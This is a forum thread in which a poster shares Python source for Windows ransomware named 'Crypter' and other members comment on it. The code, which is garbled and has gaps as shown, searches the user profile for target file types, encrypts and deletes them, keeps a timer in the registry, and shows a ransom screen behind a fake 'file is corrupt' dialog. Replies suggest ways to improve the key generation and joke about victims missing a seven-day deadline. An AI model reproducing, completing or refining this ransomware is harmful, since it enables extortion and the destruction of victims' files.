User Controls

Ok guys i think phase one of my ransomware development is complete.

  1. #1

    @summary: Crypter: Ransomware written entirely in python.
    @author: MLS
    @version: 1.0

    # Import libs
    import os
    import sys
    import win32api
    import winerror
    import win32event
    import _winreg
    import wx
    import time

    # Import classes
    import Crypt
    import Base
    import Gui

    ## CRYPTER Class ##
    class Crypter(Base.Base):
    @summary: Crypter: Controls interaction between relevant objects
    @author: MLS

    def __init__(self):
    @summary: Constructor
    self.encrypted_file_list = os.path.join(os.environ['APPDATA'], "encrypted_files.txt")

    # Init Crypt Lib
    self.Crypt = Crypt.SymmetricCrypto()

    # Encrypt!
    if not os.path.isfile(self.encrypted_file_list):
    file_list = self.find_files()
    # Start encryption
    # If no files were encrypted. do nothing
    if not os.path.isfile(self.encrypted_file_list):
    # Present GUI
    # Present menu
    elif os.path.isfile(self.encrypted_file_list):

    def get_start_time(self):
    @summary: Get's Crypter's start time from the registry, or creates it if it
    doesn't exist
    @return: The time that the ransomware began it's encryption operation, in integer epoch form

    # Try to open registry key
    reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION)
    start_time = _winreg.QueryValueEx(reg, "")[0]
    # If failure, create the key
    except WindowsError:
    start_time = int(time.time())
    reg = _winreg.CreateKey(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION)
    _winreg.SetValue(reg, "", _winreg.REG_SZ, str(start_time))

    return start_time

    def cleanup(self):
    @summary: Cleanups the system following successful decryption. Removed the list of
    encrypted files and deletes the Crypter registry key


    def delete_registry_entries(self):
    @summary: Deletes the timer registry key

    # Open and delete the key
    reg = _winreg.OpenKeyEx(_winreg.HKEY_CURRENT_USER, self.REGISTRY_LOCATION)
    _winreg.DeleteKeyEx(reg, "")

    def start_gui(self):
    @summary: Initialises and launches the ransomware GUI screen

    # Get Crypter start_time
    start_time = self.get_start_time()

    app = wx.App()
    #sys._MEIPASS = "..\\build\\images"
    crypter_gui = Gui.Gui(


    def get_encrypted_files_list(self):
    @summary: Returns a list of the files encrypted by crypter
    @return: Encrypted file list

    # Get list of encrypted files
    with open(self.encrypted_file_list) as fh:
    file_list = fh.readlines()
    except IOError:
    # Don't error, just return message
    raise Exception("A list of encrypted files was not found at: %s" % self.encrypted_file_list)

    return file_list

    def decrypt_file(self, encrypted_file, decryption_key):
    @summary: Processes the list of encrypted files and decrypts each. Should be called once per file
    @param encrypted_file: an encrypted file to decrypt

    # Decrypt!
    if not encrypted_file:

    # IF successful decryption, delete locked file
    locked_path = self.Crypt.decrypt_file(encrypted_file.rstrip(), decryption_key)
    if locked_path:

    def delete_encrypted_file_list(self):
    @summary: Deletes the list of encrypted files

    # Remove encrypted file list

    def encrypt_files(self, file_list):
    @summary: Encrypts all files in the provided file list param
    @param file_list: A list of files to encrypt
    encrypted_files = []

    # Encrypt them and add to list if successful
    for file in file_list:

    # Encrypt file if less than specified file size
    if int(os.path.getsize(file)) < self.MAX_FILE_SIZE_BYTES:
    is_encrypted = self.Crypt.encrypt_file(file)
    is_encrypted = False

    # IF encrypted, try to delete the file and add to the list
    if is_encrypted:
    # Ignore any exception, such as access denied, and continue

    # Write out list of encrypted files
    if encrypted_files:
    fh = open(self.encrypted_file_list, "w")
    for encrypted_file in encrypted_files:

    def find_files(self):
    @summary: Searches the file system and builds a list of files to encrypt
    @return: List of files matching the location and filetype criteria
    binary_name = os.path.split(sys.argv[0])[1]

    base_dirs = self.get_base_dirs(os.environ['USERPROFILE'])
    file_list = []

    for directory in base_dirs:
    for path,subdirs,files in os.walk(directory):
    for file in files:
    if os.path.isfile(os.path.join(path, file)):
    # Check file is valid
    if (
    (self.is_valid_filetype(file)) and
    (file.lower() not in self.FILES_TO_EXCLUDE) and
    (file.lower() != binary_name.lower())
    file_list.append(os.path.join(path, file))
    for file in subdirs:
    if os.path.isfile(os.path.join(path, file)):
    # Check file is valid
    if (
    (self.is_valid_filetype(file)) and
    (file.lower() not in self.FILES_TO_EXCLUDE) and
    (file.lower() != binary_name.lower())
    file_list.append(os.path.join(path, file))

    return file_list

    def is_valid_filetype(self, file):
    @summary: Verifies whether the specified file is of an acceptable type for encryption
    @param file: The file to check
    @attention: The list of filetypes to encrypt is defined in the Base.Base class

    # Split filename
    components = file.split(".")

    # If no extension, return False
    if len(components) <= 1:
    return False

    # Get extension and check if valid
    extension = components[-1]
    if extension.lower() in self.FILETYPES:
    return True
    return False

    def set_wallpaper(self):
    @summary: Sets the users wallpaper to a specific ransom not image
    @attention: FUNCTION NOW OBSOLETE. This method, and approach, is no longer used. The ransom
    note is now displayed via a WX GUI
    @requires: To enable this method, add an import for ctypes

    # Import image and write to path
    # todo adjust file name... maybe replace this with whatever is provided in the config file?
    image_path = os.path.join(sys._MEIPASS, "ransom.png")

    ctypes.windll.user32.SystemParametersInfoA(SPI_SETDESKWALLPAPER, 0, image_path, 3)

    if __name__ == "__main__":

    ## START
    # Try to grab mutex control
    mutex = win32event.CreateMutex(None, 1, "mutex_rr_windows")
    if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
    # If mutex already exists, present corruption message
    mutex = None
    app = wx.App()
    error_dialog = wx.MessageDialog(None, "The file is corrupt and cannot be opened",
    "Error", wx.OK|wx.ICON_ERROR)

    # Otherwise run crypter
    go = Crypter()

    Post last edited by Sophie at 2017-10-03T19:10:35.109489+00:00
  2. #2
    I'd take the "military grade encription" part out of the ransom note. It sound a lot like "gorillawarfare" or something Arnox would say.
  3. #3
    I'd take the "military grade encription" part out of the ransom note. It sound a lot like "gorillawarfare" or something Arnox would say.

    Yeah except AES is actually the kind of encryption the millitary uses.
  4. #4
    Well, then that's cool but it sounds cheesy to the uneducated. Who do you want scam with this?
  5. #5
    Well, then that's cool but it sounds cheesy to the uneducated. Who do you want scam with this?

    What do you mean scam, this will literally encrypt all your files and make them useless until i give you the key an decrypting binary. Also i made it because i thought it was a very interesting subject and excersise to do. And of course for e-cred in the hacking scene.
  6. #6
    A ransom note usually involves you trying to get money from someone for something that was already in their posession. In this case the data.

    Is this just for fun then?
  7. #7
    A ransom note usually involves you trying to get money from someone for something that was already in their posession. In this case the data.

    Is this just for fun then?

    Yes, but it's for fun as a gun is for fun. You can shoot cans and holes into melons but you can just as easily do some serious damage to a person or property.
  8. #8
    Profit, though. You need dat cheddah.
  9. #9
    Merlin Houston
    Cool stuff. Is there a reason to use an RSA key? I think it's marginally more work to generate than just creating a random value to use as a symmetric key. I guess it doesn't really matter in the grand scheme.
  10. #10
    Cool stuff. Is there a reason to use an RSA key? I think it's marginally more work to generate than just creating a random value to use as a symmetric key. I guess it doesn't really matter in the grand scheme.

    Thank you kind sir i try me hardest. With regards to the RSA key, it' s how i learned to operate the module, like you said there are more than one possibility i just went with what i know.
  11. #11
    Lewl, just realized i forgot to call the note function. It' s since been fixed.
  12. #12
    aldra JIDF Controlled Opposition

    I can't read code right now though eyes are bleeding
  13. #13
    aldra JIDF Controlled Opposition
    also yeah like merlin said, looks like you're just using the RSA function to generate a 2048 bit key, which is saved as a string and then passed to the AES encoder as a key (in string form) - you'd do better just to randomly generate a 2048char random char string, because I believe the RSA key will come out in BASE64, using only numbers and some uppercase letters
  14. #14
    also yeah like merlin said, looks like you're just using the RSA function to generate a 2048 bit key, which is saved as a string and then passed to the AES encoder as a key (in string form) - you'd do better just to randomly generate a 2048char random char string, because I believe the RSA key will come out in BASE64, using only numbers and some uppercase letters

    If you're calling a function from a module you have imported it's called a method in python i think. But yes you are right, would you say this is a significant flaw? Because 2048 char key is hard to crack even if it's in BASE64 format.

    Also, by 'acquire' do you mean 'want'? Because that would flatter me, and flattery will certainly get you somewhere with me. And, and, and if you want we could collaborate on the project, i'd like that, aldra-senpai. Don't forget you can always clone from my repo at github, open an issue and/or a pull request should you desire
  15. #15
    Had a bug enumerating the files we want to encrypt fixed that and updated Crypter accordingly. It will pwn your rig like it's nobodies business now lol.

    Post last edited by Sophie at 2017-10-03T19:11:45.598879+00:00
  16. #16
    top lol

    Post last edited by Sophie at 2017-10-03T19:11:05.524494+00:00
  17. #17

  18. #18
    But yes you are right, would you say this is a significant flaw? Because 2048 char key is hard to crack even if it's in BASE64 format.

    I wouldn't worry about it for now. There's virtually no chance of your target cracking the key in 7 days.
  19. #19
    I wouldn't worry about it for now. There's virtually no chance of your target cracking the key in 7 days.

    RIght lol.
  20. #20
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